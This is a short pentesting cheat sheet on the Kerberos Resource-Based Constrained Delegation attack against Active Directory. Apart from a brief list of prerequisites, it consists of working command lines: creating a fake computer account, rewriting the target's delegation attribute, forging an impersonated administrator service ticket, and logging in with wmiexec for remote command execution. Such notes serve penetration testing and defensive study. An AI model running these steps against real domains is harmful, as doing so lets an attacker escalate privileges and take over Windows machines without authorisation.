Resource-Based Constrained Delegation Attack
Last modified: 2023-02-18
Active Directory
Kerberos
Windows
Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.
Exploit
Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation
0. Prerequisites
To achieve this attack successfully, we need the following conditions:
- A domain account who has permission to write the computer (
msDS-AllowedToActOnBehalfOfOtherIdentityproperty of the domain object). - A domain account who has permission to create a new computer.
- LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
- Kerberos (88) access to the DC.
1. Create Fake Computer
impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip 10.0.0.1 example.local/username:password
2. Modify Delegation Rights
We can use rbcd.py for abusing msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.
rbcd.py -f FAKECOMPUTER -t WEB -dc-ip 10.0.0.1 example\\username:password
rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass
3. Get the Impersonated Service Ticket
Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.
getST.py -spn cifs/example.local -impersonate admin -dc-ip 10.0.0.1 example.local/FAKECOMPUTER$:password
4. Use the Service Ticket
After getting the service ticket, we can use it for further pentesting.
Before doing that, we need to add the environment variable as below:
export KRB5CCNAME=`pwd`/admin.ccache
# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist
-
Login to Services with Kerberos Auth
# -k: Use Kerberos Auth # -no-pass: No password impacket-wmiexec example.local/Administrator@example.local -k -no-pass